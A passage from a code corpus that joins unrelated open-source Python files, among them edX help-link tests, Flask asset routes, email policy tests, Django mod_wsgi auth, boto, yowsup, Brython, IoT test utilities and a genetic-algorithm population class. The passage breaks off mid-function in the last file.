assert_nav_help_link(
test=self,
page=self.export_page,
href=expected_url,
)
def test_tools_import_side_bar_help(self):
"""
Scenario: Help link in side bar is working on tools Library export page
Given that I am on the tools Library import page
And I want help about the process
And I click the 'Learn more about exporting a course' in the sidebar links
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/releasing_course/export_import_course.html#export-a-course')
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.export_page,
href=expected_url,
help_text='Learn more about exporting a course',
)
@attr(shard=10)
class StudioWelcomeHelpTest(AcceptanceTest):
"""
Tests help link on 'Welcome' page ( User not logged in)
"""
def setUp(self):
super(StudioWelcomeHelpTest, self).setUp()
self.index_page = IndexPage(self.browser)
self.index_page.visit()
def test_welcome_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Welcome' page (User not logged in).
Given that I am on the 'Welcome' page.
And I want help about the edx
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should be correct
"""
expected_url = _get_expected_documentation_url('/getting_started/index.html')
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.index_page,
href=expected_url,
signed_in=False
)
| agpl-3.0 |
asascience-open/ooi-ui-services | ooiservices/app/uframe/assets_remote_resources.py | 1 | 4930 |
"""
Asset Management - Asset Remote Resources routes.
Routes:
[GET] /remote_resources/<int:asset_id> # Get all remote resources for asset using asset id.
[GET] /remote_resources/<string:asset_uid> # Get all remote resources for asset using asset uid.
[GET] /remote_resource/<int:resource_id> # Get remote resource by remoteResourceId.
[POST] /remote_resource/<string:asset_uid> # Create a remote resource for an asset
[PUT] /remote_resource/<string:asset_uid> # Update a remote resource for an asset
"""
__author__ = 'Edna Donoughe'
from flask import request, jsonify, current_app
from ooiservices.app.main.errors import (bad_request, conflict)
from ooiservices.app.uframe import uframe as api
from ooiservices.app.main.authentication import auth
from ooiservices.app.decorators import scope_required
from ooiservices.app.uframe.assets_create_update import (_create_remote_resource, _update_remote_resource,
_get_remote_resources_by_asset_id,
_get_remote_resources_by_asset_uid,
_get_remote_resource_by_resource_id)
import json
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Remote Resources routes.
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Get the remote resources for an asset using asset id.
@auth.login_required
@scope_required(u'asset_manager')
@api.route('/remote_resources/<int:asset_id>', methods=['GET'])
def get_remote_resources_by_asset_id(asset_id):
""" Create a new remote resource for an asset.
"""
try:
remote_resources = _get_remote_resources_by_asset_id(asset_id)
result = jsonify({'remote_resources': remote_resources})
return result
except Exception as err:
message = str(err)
current_app.logger.info(message)
return bad_request(message)
# Get the remote resources for an asset using asset uid.
@auth.login_required
@scope_required(u'asset_manager')
@api.route('/remote_resources/<string:asset_uid>', methods=['GET'])
def get_remote_resources_by_asset_uid(asset_uid):
""" Create a new remote resource for an asset.
"""
try:
remote_resources = _get_remote_resources_by_asset_uid(asset_uid)
result = jsonify({'remote_resources': remote_resources})
return result
except Exception as err:
message = str(err)
current_app.logger.info(message)
return bad_request(message)
# Get a remote resource by remote resource id.
@auth.login_required
@scope_required(u'asset_manager')
@api.route('/remote_resource/<int:resource_id>', methods=['GET'])
def get_remote_resource_by_resource_id(resource_id):
""" Create a new remote resource for an asset.
"""
try:
remote_resource = _get_remote_resource_by_resource_id(resource_id)
return jsonify({'remote_resource': remote_resource})
except Exception as err:
message = str(err)
current_app.logger.info(message)
return bad_request(message)
# Create a remote resource for an asset.
@auth.login_required
@scope_required(u'asset_manager')
@api.route('/remote_resource/<string:asset_uid>', methods=['POST'])
def create_remote_resource(asset_uid):
""" Create a new remote resource for an asset.
"""
try:
if not request.data:
message = 'No data provided to create a remote resource.'
raise Exception(message)
data = json.loads(request.data)
remote_resource = _create_remote_resource(asset_uid, data)
if not remote_resource:
message = 'Failed to create remote resource for asset.'
return conflict(message)
return jsonify({'remote_resource': remote_resource}), 201
except Exception as err:
message = str(err)
current_app.logger.info(message)
return bad_request(message)
# Update a remote resource by asset uid.
@auth.login_required
@scope_required(u'asset_manager')
@api.route('/remote_resource/<string:asset_uid>', methods=['PUT'])
def update_remote_resource(asset_uid):
""" Update a remote resource for an asset.
"""
try:
if not request.data:
message = 'No data provided to update a remote resource.'
raise Exception(message)
data = json.loads(request.data)
remote_resource = _update_remote_resource(asset_uid, data)
if not remote_resource:
message = 'Unable to get update remote resource for asset uid \'%s\'.' % asset_uid
return conflict(message)
return jsonify({'remote_resource': remote_resource})
except Exception as err:
message = str(err)
current_app.logger.info(message)
return bad_request(message) | apache-2.0 |
Mozhuowen/brython | www/src/Lib/test/test_email/test_policy.py | 34 | 13040 | import io
import types
import textwrap
import unittest
import email.policy
import email.parser
import email.generator
from email import headerregistry
def make_defaults(base_defaults, differences):
defaults = base_defaults.copy()
defaults.update(differences)
return defaults
class PolicyAPITests(unittest.TestCase):
longMessage = True
# Base default values.
compat32_defaults = {
'max_line_length': 78,
'linesep': '\n',
'cte_type': '8bit',
'raise_on_defect': False,
}
# These default values are the ones set on email.policy.default.
# If any of these defaults change, the docs must be updated.
policy_defaults = compat32_defaults.copy()
policy_defaults.update({
'raise_on_defect': False,
'header_factory': email.policy.EmailPolicy.header_factory,
'refold_source': 'long',
})
# For each policy under test, we give here what we expect the defaults to
# be for that policy. The second argument to make defaults is the
# difference between the base defaults and that for the particular policy.
new_policy = email.policy.EmailPolicy()
policies = {
email.policy.compat32: make_defaults(compat32_defaults, {}),
email.policy.default: make_defaults(policy_defaults, {}),
email.policy.SMTP: make_defaults(policy_defaults,
{'linesep': '\r\n'}),
email.policy.HTTP: make_defaults(policy_defaults,
{'linesep': '\r\n',
'max_line_length': None}),
email.policy.strict: make_defaults(policy_defaults,
{'raise_on_defect': True}),
new_policy: make_defaults(policy_defaults, {}),
}
# Creating a new policy creates a new header factory. There is a test
# later that proves this.
policies[new_policy]['header_factory'] = new_policy.header_factory
def test_defaults(self):
for policy, expected in self.policies.items():
for attr, value in expected.items():
self.assertEqual(getattr(policy, attr), value,
("change {} docs/docstrings if defaults have "
"changed").format(policy))
def test_all_attributes_covered(self):
for policy, expected in self.policies.items():
for attr in dir(policy):
if (attr.startswith('_') or
isinstance(getattr(email.policy.EmailPolicy, attr),
types.FunctionType)):
continue
else:
self.assertIn(attr, expected,
"{} is not fully tested".format(attr))
def test_abc(self):
with self.assertRaises(TypeError) as cm:
email.policy.Policy()
msg = str(cm.exception)
abstract_methods = ('fold',
'fold_binary',
'header_fetch_parse',
'header_source_parse',
'header_store_parse')
for method in abstract_methods:
self.assertIn(method, msg)
def test_policy_is_immutable(self):
for policy, defaults in self.policies.items():
for attr in defaults:
with self.assertRaisesRegex(AttributeError, attr+".*read-only"):
setattr(policy, attr, None)
with self.assertRaisesRegex(AttributeError, 'no attribute.*foo'):
policy.foo = None
def test_set_policy_attrs_when_cloned(self):
# None of the attributes has a default value of None, so we set them
# all to None in the clone call and check that it worked.
for policyclass, defaults in self.policies.items():
testattrdict = {attr: None for attr in defaults}
policy = policyclass.clone(**testattrdict)
for attr in defaults:
self.assertIsNone(getattr(policy, attr))
def test_reject_non_policy_keyword_when_called(self):
for policyclass in self.policies:
with self.assertRaises(TypeError):
policyclass(this_keyword_should_not_be_valid=None)
with self.assertRaises(TypeError):
policyclass(newtline=None)
def test_policy_addition(self):
expected = self.policy_defaults.copy()
p1 = email.policy.default.clone(max_line_length=100)
p2 = email.policy.default.clone(max_line_length=50)
added = p1 + p2
expected.update(max_line_length=50)
for attr, value in expected.items():
self.assertEqual(getattr(added, attr), value)
added = p2 + p1
expected.update(max_line_length=100)
for attr, value in expected.items():
self.assertEqual(getattr(added, attr), value)
added = added + email.policy.default
for attr, value in expected.items():
self.assertEqual(getattr(added, attr), value)
def test_register_defect(self):
class Dummy:
def __init__(self):
self.defects = []
obj = Dummy()
defect = object()
policy = email.policy.EmailPolicy()
policy.register_defect(obj, defect)
self.assertEqual(obj.defects, [defect])
defect2 = object()
policy.register_defect(obj, defect2)
self.assertEqual(obj.defects, [defect, defect2])
class MyObj:
def __init__(self):
self.defects = []
class MyDefect(Exception):
pass
def test_handle_defect_raises_on_strict(self):
foo = self.MyObj()
defect = self.MyDefect("the telly is broken")
with self.assertRaisesRegex(self.MyDefect, "the telly is broken"):
email.policy.strict.handle_defect(foo, defect)
def test_handle_defect_registers_defect(self):
foo = self.MyObj()
defect1 = self.MyDefect("one")
email.policy.default.handle_defect(foo, defect1)
self.assertEqual(foo.defects, [defect1])
defect2 = self.MyDefect("two")
email.policy.default.handle_defect(foo, defect2)
self.assertEqual(foo.defects, [defect1, defect2])
class MyPolicy(email.policy.EmailPolicy):
defects = None
def __init__(self, *args, **kw):
super().__init__(*args, defects=[], **kw)
def register_defect(self, obj, defect):
self.defects.append(defect)
def test_overridden_register_defect_still_raises(self):
foo = self.MyObj()
defect = self.MyDefect("the telly is broken")
with self.assertRaisesRegex(self.MyDefect, "the telly is broken"):
self.MyPolicy(raise_on_defect=True).handle_defect(foo, defect)
def test_overriden_register_defect_works(self):
foo = self.MyObj()
defect1 = self.MyDefect("one")
my_policy = self.MyPolicy()
my_policy.handle_defect(foo, defect1)
self.assertEqual(my_policy.defects, [defect1])
self.assertEqual(foo.defects, [])
defect2 = self.MyDefect("two")
my_policy.handle_defect(foo, defect2)
self.assertEqual(my_policy.defects, [defect1, defect2])
self.assertEqual(foo.defects, [])
def test_default_header_factory(self):
h = email.policy.default.header_factory('Test', 'test')
self.assertEqual(h.name, 'Test')
self.assertIsInstance(h, headerregistry.UnstructuredHeader)
self.assertIsInstance(h, headerregistry.BaseHeader)
class Foo:
parse = headerregistry.UnstructuredHeader.parse
def test_each_Policy_gets_unique_factory(self):
policy1 = email.policy.EmailPolicy()
policy2 = email.policy.EmailPolicy()
policy1.header_factory.map_to_type('foo', self.Foo)
h = policy1.header_factory('foo', 'test')
self.assertIsInstance(h, self.Foo)
self.assertNotIsInstance(h, headerregistry.UnstructuredHeader)
h = policy2.header_factory('foo', 'test')
self.assertNotIsInstance(h, self.Foo)
self.assertIsInstance(h, headerregistry.UnstructuredHeader)
def test_clone_copies_factory(self):
policy1 = email.policy.EmailPolicy()
policy2 = policy1.clone()
policy1.header_factory.map_to_type('foo', self.Foo)
h = policy1.header_factory('foo', 'test')
self.assertIsInstance(h, self.Foo)
h = policy2.header_factory('foo', 'test')
self.assertIsInstance(h, self.Foo)
def test_new_factory_overrides_default(self):
mypolicy = email.policy.EmailPolicy()
myfactory = mypolicy.header_factory
newpolicy = mypolicy + email.policy.strict
self.assertEqual(newpolicy.header_factory, myfactory)
newpolicy = email.policy.strict + mypolicy
self.assertEqual(newpolicy.header_factory, myfactory)
def test_adding_default_policies_preserves_default_factory(self):
newpolicy = email.policy.default + email.policy.strict
self.assertEqual(newpolicy.header_factory,
email.policy.EmailPolicy.header_factory)
self.assertEqual(newpolicy.__dict__, {'raise_on_defect': True})
# XXX: Need subclassing tests.
# For adding subclassed objects, make sure the usual rules apply (subclass
# wins), but that the order still works (right overrides left).
class TestPolicyPropagation(unittest.TestCase):
# The abstract methods are used by the parser but not by the wrapper
# functions that call it, so if the exception gets raised we know that the
# policy was actually propagated all the way to feedparser.
class MyPolicy(email.policy.Policy):
def badmethod(self, *args, **kw):
raise Exception("test")
fold = fold_binary = header_fetch_parser = badmethod
header_source_parse = header_store_parse = badmethod
def test_message_from_string(self):
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_string("Subject: test\n\n",
policy=self.MyPolicy)
def test_message_from_bytes(self):
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_bytes(b"Subject: test\n\n",
policy=self.MyPolicy)
def test_message_from_file(self):
f = io.StringIO('Subject: test\n\n')
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_file(f, policy=self.MyPolicy)
def test_message_from_binary_file(self):
f = io.BytesIO(b'Subject: test\n\n')
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_binary_file(f, policy=self.MyPolicy)
# These are redundant, but we need them for black-box completeness.
def test_parser(self):
p = email.parser.Parser(policy=self.MyPolicy)
with self.assertRaisesRegex(Exception, "^test$"):
p.parsestr('Subject: test\n\n')
def test_bytes_parser(self):
p = email.parser.BytesParser(policy=self.MyPolicy)
with self.assertRaisesRegex(Exception, "^test$"):
p.parsebytes(b'Subject: test\n\n')
# Now that we've established that all the parse methods get the
# policy in to feedparser, we can use message_from_string for
# the rest of the propagation tests.
def _make_msg(self, source='Subject: test\n\n', policy=None):
self.policy = email.policy.default.clone() if policy is None else policy
return email.message_from_string(source, policy=self.policy)
def test_parser_propagates_policy_to_message(self):
msg = self._make_msg()
self.assertIs(msg.policy, self.policy)
def test_parser_propagates_policy_to_sub_messages(self):
msg = self._make_msg(textwrap.dedent("""\
Subject: mime test
MIME-Version: 1.0
Content-Type: multipart/mixed, boundary="XXX"
--XXX
Content-Type: text/plain
test
--XXX
Content-Type: text/plain
test2
--XXX--
"""))
for part in msg.walk():
self.assertIs(part.policy, self.policy)
def test_message_policy_propagates_to_generator(self):
msg = self._make_msg("Subject: test\nTo: foo\n\n",
policy=email.policy.default.clone(linesep='X'))
s = io.StringIO()
g = email.generator.Generator(s)
g.flatten(msg)
self.assertEqual(s.getvalue(), "Subject: testXTo: fooXX")
def test_message_policy_used_by_as_string(self):
msg = self._make_msg("Subject: test\nTo: foo\n\n",
policy=email.policy.default.clone(linesep='X'))
self.assertEqual(msg.as_string(), "Subject: testXTo: fooXX")
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
js0701/chromium-crosswalk | tools/telemetry/third_party/webpagereplay/third_party/dns/__init__.py | 215 | 1293 | # Copyright (C) 2003-2007, 2009 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""dnspython DNS toolkit"""
__all__ = [
'dnssec',
'e164',
'edns',
'entropy',
'exception',
'flags',
'inet',
'ipv4',
'ipv6',
'message',
'name',
'namedict',
'node',
'opcode',
'query',
'rcode',
'rdata',
'rdataclass',
'rdataset',
'rdatatype',
'renderer',
'resolver',
'reversename',
'rrset',
'set',
'tokenizer',
'tsig',
'tsigkeyring',
'ttl',
'rdtypes',
'update',
'version',
'zone',
]
| bsd-3-clause |
RossBrunton/django | django/contrib/auth/handlers/modwsgi.py | 537 | 1344 | from django import db
from django.contrib import auth
from django.utils.encoding import force_bytes
def check_password(environ, username, password):
"""
Authenticates against Django's auth database
mod_wsgi docs specify None, True, False as return value depending
on whether the user exists and authenticates.
"""
UserModel = auth.get_user_model()
# db connection state is managed similarly to the wsgi handler
# as mod_wsgi may call these functions outside of a request/response cycle
db.reset_queries()
try:
try:
user = UserModel._default_manager.get_by_natural_key(username)
except UserModel.DoesNotExist:
return None
if not user.is_active:
return None
return user.check_password(password)
finally:
db.close_old_connections()
def groups_for_user(environ, username):
"""
Authorizes a user based on groups
"""
UserModel = auth.get_user_model()
db.reset_queries()
try:
try:
user = UserModel._default_manager.get_by_natural_key(username)
except UserModel.DoesNotExist:
return []
if not user.is_active:
return []
return [force_bytes(group.name) for group in user.groups.all()]
finally:
db.close_old_connections()
| bsd-3-clause |
yangchaogit/boto | boto/ec2/autoscale/tag.py | 173 | 3379 | # Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Tag(object):
"""
A name/value tag on an AutoScalingGroup resource.
:ivar key: The key of the tag.
:ivar value: The value of the tag.
:ivar propagate_at_launch: Boolean value which specifies whether the
new tag will be applied to instances launched after the tag is created.
:ivar resource_id: The name of the autoscaling group.
:ivar resource_type: The only supported resource type at this time
is "auto-scaling-group".
"""
def __init__(self, connection=None, key=None, value=None,
propagate_at_launch=False, resource_id=None,
resource_type='auto-scaling-group'):
self.connection = connection
self.key = key
self.value = value
self.propagate_at_launch = propagate_at_launch
self.resource_id = resource_id
self.resource_type = resource_type
def __repr__(self):
return 'Tag(%s=%s)' % (self.key, self.value)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'Key':
self.key = value
elif name == 'Value':
self.value = value
elif name == 'PropagateAtLaunch':
if value.lower() == 'true':
self.propagate_at_launch = True
else:
self.propagate_at_launch = False
elif name == 'ResourceId':
self.resource_id = value
elif name == 'ResourceType':
self.resource_type = value
def build_params(self, params, i):
"""
Populates a dictionary with the name/value pairs necessary
to identify this Tag in a request.
"""
prefix = 'Tags.member.%d.' % i
params[prefix + 'ResourceId'] = self.resource_id
params[prefix + 'ResourceType'] = self.resource_type
params[prefix + 'Key'] = self.key
params[prefix + 'Value'] = self.value
if self.propagate_at_launch:
params[prefix + 'PropagateAtLaunch'] = 'true'
else:
params[prefix + 'PropagateAtLaunch'] = 'false'
def delete(self):
return self.connection.delete_tags([self])
| mit |
Juanpf/yowsup | yowsup/layers/protocol_groups/protocolentities/iq_groups_participants_add_success.py | 61 | 1785 | from yowsup.structs import ProtocolTreeNode
from yowsup.layers.protocol_iq.protocolentities import ResultIqProtocolEntity
class SuccessAddParticipantsIqProtocolEntity(ResultIqProtocolEntity):
'''
<iq type="result" from="{{group_jid}}" id="{{id}}">
<add type="success" participant="{{jid}}"></add>
<add type="success" participant="{{jid}}"></add>
</iq>
'''
def __init__(self, _id, groupId, participantList):
super(SuccessAddParticipantsIqProtocolEntity, self).__init__(_from = groupId, _id = _id)
self.setProps(groupId, participantList)
def setProps(self, groupId, participantList):
self.groupId = groupId
self.participantList = participantList
self.action = 'add'
def getAction(self):
return self.action
def toProtocolTreeNode(self):
node = super(SuccessAddParticipantsIqProtocolEntity, self).toProtocolTreeNode()
participantNodes = [
ProtocolTreeNode("add", {
"type": "success",
"participant": participant
})
for participant in self.participantList
]
node.addChildren(participantNodes)
return node
@staticmethod
def fromProtocolTreeNode(node):
entity = super(SuccessAddParticipantsIqProtocolEntity, SuccessAddParticipantsIqProtocolEntity).fromProtocolTreeNode(node)
entity.__class__ = SuccessAddParticipantsIqProtocolEntity
participantList = []
for participantNode in node.getAllChildren():
if participantNode["type"]=="success":
participantList.append(participantNode["participant"])
entity.setProps(node.getAttributeValue("from"), participantList)
return entity
| gpl-3.0 |
2014c2g2/2015cda | static/Brython3.1.1-20150328-091302/Lib/_string.py | 625 | 1112 | """string helper module"""
import re
class __loader__(object):
pass
def formatter_field_name_split(fieldname):
"""split the argument as a field name"""
_list=[]
for _name in fieldname:
_parts = _name.split('.')
for _item in _parts:
is_attr=False #fix me
if re.match('\d+', _item):
_list.append((int(_item), is_attr))
else:
_list.append((_item, is_attr))
return _list[0][0], iter(_list[1:])
def formatter_parser(*args,**kw):
"""parse the argument as a format string"""
assert len(args)==1
assert isinstance(args[0], str)
_result=[]
for _match in re.finditer("([^{]*)?(\{[^}]*\})?", args[0]):
_pre, _fmt = _match.groups()
if _fmt is None:
_result.append((_pre, None, None, None))
elif _fmt == '{}':
_result.append((_pre, '', '', None))
else:
_m=re.match("\{([^!]*)!?(.*)?\}", _fmt)
_name=_m.groups(0)
_flags=_m.groups(1)
_result.append((_pre, _name, _flags, None))
return _result
| gpl-3.0 |
ibm-messaging/iot-python | test/testUtils/__init__.py | 2 | 2972 | # *****************************************************************************
# Copyright (c) 2018 IBM Corporation and other Contributors.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
# *****************************************************************************
import wiotp.sdk.application
import pytest
import os
oneJobOnlyTest = pytest.mark.skipif(
os.getenv("ONE_JOB_ONLY_TESTS", "true") == "false",
reason="Doesn't support running in multiple envs in parallel due to limits on # of service bindings allowed",
)
class AbstractTest(object):
WIOTP_API_KEY = os.getenv("WIOTP_API_KEY")
WIOTP_API_TOKEN = os.getenv("WIOTP_API_TOKEN")
CLOUDANT_HOST = os.getenv("CLOUDANT_HOST", None)
CLOUDANT_PORT = os.getenv("CLOUDANT_PORT", None)
CLOUDANT_USERNAME = os.getenv("CLOUDANT_USERNAME", None)
CLOUDANT_PASSWORD = os.getenv("CLOUDANT_PASSWORD", None)
EVENTSTREAMS_API_KEY = os.getenv("EVENTSTREAMS_API_KEY")
EVENTSTREAMS_ADMIN_URL = os.getenv("EVENTSTREAMS_ADMIN_URL")
EVENTSTREAMS_BROKER1 = os.getenv("EVENTSTREAMS_BROKER1")
EVENTSTREAMS_BROKER2 = os.getenv("EVENTSTREAMS_BROKER2")
EVENTSTREAMS_BROKER3 = os.getenv("EVENTSTREAMS_BROKER3")
EVENTSTREAMS_BROKER4 = os.getenv("EVENTSTREAMS_BROKER4")
EVENTSTREAMS_BROKER5 = os.getenv("EVENTSTREAMS_BROKER5")
EVENTSTREAMS_USER = os.getenv("EVENTSTREAMS_USER")
EVENTSTREAMS_PASSWORD = os.getenv("EVENTSTREAMS_PASSWORD")
DB2_HOST = os.getenv("DB2_HOST")
DB2_PORT = os.getenv("DB2_PORT")
DB2_USERNAME = os.getenv("DB2_USERNAME")
DB2_PASSWORD = os.getenv("DB2_PASSWORD")
DB2_HTTPS_URL = os.getenv("DB2_HTTPS_URL")
DB2_SSL_DSN = os.getenv("DB2_SSL_DSN")
DB2_HOST = os.getenv("DB2_HOST")
DB2_URI = os.getenv("DB2_URI")
DB2_DB = os.getenv("DB2_DB")
DB2_SSLJDCURL = os.getenv("DB2_SSLJDCURL")
DB2_JDBCURL = os.getenv("DB2_JDBCURL")
POSTGRES_HOSTNAME = os.getenv("POSTGRES_HOSTNAME")
POSTGRES_PORT = os.getenv("POSTGRES_PORT")
POSTGRES_USERNAME = os.getenv("POSTGRES_USERNAME")
POSTGRES_PASSWORD = os.getenv("POSTGRES_PASSWORD")
POSTGRES_CERTIFICATE = os.getenv("POSTGRES_CERTIFICATE")
POSTGRES_DATABASE = os.getenv("POSTGRES_DATABASE")
try:
ORG_ID = WIOTP_API_KEY.split("-")[1]
except:
ORG_ID = None
if WIOTP_API_KEY is None:
raise Exception("WIOTP_API_KEY environment variable is not set")
if WIOTP_API_TOKEN is None:
raise Exception("WIOTP_API_TOKEN environment variable is not set")
if ORG_ID is None:
raise Exception("Unable to set ORG_ID from WIOTP_API_KEY")
options = wiotp.sdk.application.parseEnvVars()
# import pprint
# pprint.pprint(options)
appClient = wiotp.sdk.application.ApplicationClient(options)
| epl-1.0 |
thumt/THUMT | thumt/utils/convert_params.py | 1 | 3165 | # coding=utf-8
# Copyright 2017-2020 The THUMT Authors
# Modified from torch.nn.utils.convert_parameters.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
def params_to_vec(parameters):
r"""Convert parameters to one vector
Arguments:
parameters (Iterable[Tensor]): an iterator of Tensors that are the
parameters of a model.
Returns:
The parameters represented by a single vector
"""
# Flag for the device where the parameter is located
param_device = None
vec = []
for param in parameters:
if param is None:
continue
# Ensure the parameters are located in the same device
param_device = _check_param_device(param, param_device)
vec.append(param.view(-1))
return torch.cat(vec)
def vec_to_params(vec, parameters):
r"""Convert one vector to the parameters
Arguments:
vec (Tensor): a single vector represents the parameters of a model.
parameters (Iterable[Tensor]): an iterator of Tensors that are the
parameters of a model.
"""
# Ensure vec of type Tensor
if not isinstance(vec, torch.Tensor):
raise TypeError("expected torch.Tensor, but got: {}"
.format(torch.typename(vec)))
# Flag for the device where the parameter is located
param_device = None
# Pointer for slicing the vector for each parameter
pointer = 0
for param in parameters:
if param is None:
continue
# Ensure the parameters are located in the same device
param_device = _check_param_device(param, param_device)
# The length of the parameter
num_param = param.numel()
# Slice the vector, reshape it, and replace the old data of the parameter
param.data = vec[pointer:pointer + num_param].view_as(param).data
# Increment the pointer
pointer += num_param
def _check_param_device(param, old_param_device):
r"""This helper function is to check if the parameters are located
in the same device. Currently, the conversion between model parameters
and single vector form is not supported for multiple allocations,
e.g. parameters in different GPUs, or mixture of CPU/GPU.
Arguments:
param ([Tensor]): a Tensor of a parameter of a model
old_param_device (int): the device where the first parameter of a
model is allocated.
Returns:
old_param_device (int): report device for the first time
"""
# Meet the first parameter
if old_param_device is None:
old_param_device = param.get_device() if param.is_cuda else -1
else:
warn = False
if param.is_cuda: # Check if in same GPU
warn = (param.get_device() != old_param_device)
else: # Check if in CPU
warn = (old_param_device != -1)
if warn:
raise TypeError("Found two parameters on different devices,"
" this is currently not supported.")
return old_param_device
| bsd-3-clause |
unbornchikken/genevo-python | genevo/optimizers/population.py | 1 | 6041 | import torch
from .organization import Organization
from .dna import dna
from ..tex import tex
class Population:
def __init__(self, owner):
assert hasattr(owner, 'make_seed_dna') and callable(owner.make_seed_dna)
assert hasattr(owner, 'calculate_fitness') and callable(owner.calculate_fitness)
self._owner = owner
self._dna_tensor = tex.constant(0, owner.dna_size, owner.population_size)
self._order_by = torch.arange(0, owner.population_size)
self._bodies = None
self._fitness = None
self._sorted_dna_tensor = None
self._idx = 0
@property
def sorted(self):
return self._fitness is not None and self._bodies is not None
def _verify_sorted(self):
if not self.sorted:
raise RuntimeError('Population is not sorted.')
def __len__(self):
return self._idx
def get_organization_and_fitness_at(self, index, fitness_as_tensor=True):
if index < len(self):
idx = int(self._order_by[index])
body = self._bodies[idx] if self._bodies is not None else None
org = Organization(dna.create(tex.idx(self._dna_tensor, tex.span, idx)), body)
fit = None
if self.sorted:
if fitness_as_tensor:
fit = self._fitness.narrow(0, idx, 1)
else:
fit = self._fitness[idx]
return org, fit
return None
def get_dna_tensor(self, get_sorted=True):
if get_sorted:
self._verify_sorted()
if self._sorted_dna_tensor is None:
self._sorted_dna_tensor = torch.index_select(self._dna_tensor, 1, self._order_by)
return self._sorted_dna_tensor
return self._dna_tensor
def fill(self):
if len(self) != 0:
raise RuntimeError('Population is not empty.')
while len(self) != self._owner.population_size:
self.push(self._owner.make_seed_dna())
def push(self, item):
idx = self._idx
if idx == self._owner.population_size:
raise RuntimeError('Population is full.')
tensor = None
if isinstance(item, tuple):
if len(item) != 2:
raise ValueError('Invalid tuple length.')
if not ((item[0] is None or torch.is_tensor(item[0])) and torch.is_tensor(item[1])):
raise ValueError('Invalid arguments.')
if item[0] is None:
tensor = item[1]
else:
tensor = tex.join(1, item[0], item[1])
elif torch.is_tensor(item):
tensor = item
else:
raise TypeError('Unknown argument.')
if tensor is not None:
tensor_size = tensor.size()
count = tensor_size[1] if len(tensor_size) == 2 else 1
self._dna_tensor[:, idx:idx + count] = tensor
self._idx += count
def calculate_fitness(self):
if self._fitness:
raise RuntimeError('Fitness is already calculated.')
if self._owner.population_size != len(self):
raise RuntimeError('Population is not full.')
res = self._owner.calculate_fitness(self._dna_tensor)
if not isinstance(res, tuple) or len(res) != 2:
raise TypeError('Result of "calculate_fitness" is not a tuple of length 2.')
if not isinstance(res[0], list):
raise TypeError('First value of result of "calculate_fitness" is not a list.')
if len(res[0]) != len(self):
raise ValueError(
'First value of result of "calculate_fitness" length is not {}.'\
.format(len(self)))
self._bodies = res[0]
if not torch.is_tensor(res[1]):
raise TypeError('Second value of result of "calculate_fitness" is not a tensor.')
self._fitness = res[1]
if self._fitness.size() != (len(self), ):
raise ValueError(
'Second value of result of "calculate_fitness" dims is not ({}, ).'\
.format(len(self)))
def sort(self):
self.calculate_fitness()
res = torch.sort(self._fitness)
self._order_by = res[1]
def make_crossovered_dna(self, std_dev=0.3, keep_elites_rate=0.05):
elites, remaining, remaining_size =\
self._initialize_selection(keep_elites_rate)
idx1 =\
(torch.abs(torch.randn(remaining_size) * std_dev) * remaining_size).clamp(max = remaining_size - 1).long()
idx2 =\
(torch.abs(torch.randn(remaining_size) * std_dev) * remaining_size).clamp(max = remaining_size - 1).long()
dna_tensor1 = torch.index_select(remaining, 1, idx1)
dna_tensor2 = torch.index_select(remaining, 1, idx2)
crossovered = dna.crossover(dna_tensor1, dna_tensor2)
return elites, crossovered
def make_normal_dist_dna(self, std_dev=0.3, keep_elites_rate=0.05):
elites, remaining, remaining_size =\
self._initialize_selection(keep_elites_rate)
idx =\
(torch.abs(torch.randn(remaining_size) * std_dev) * remaining_size).clamp(max = remaining_size - 1).long()
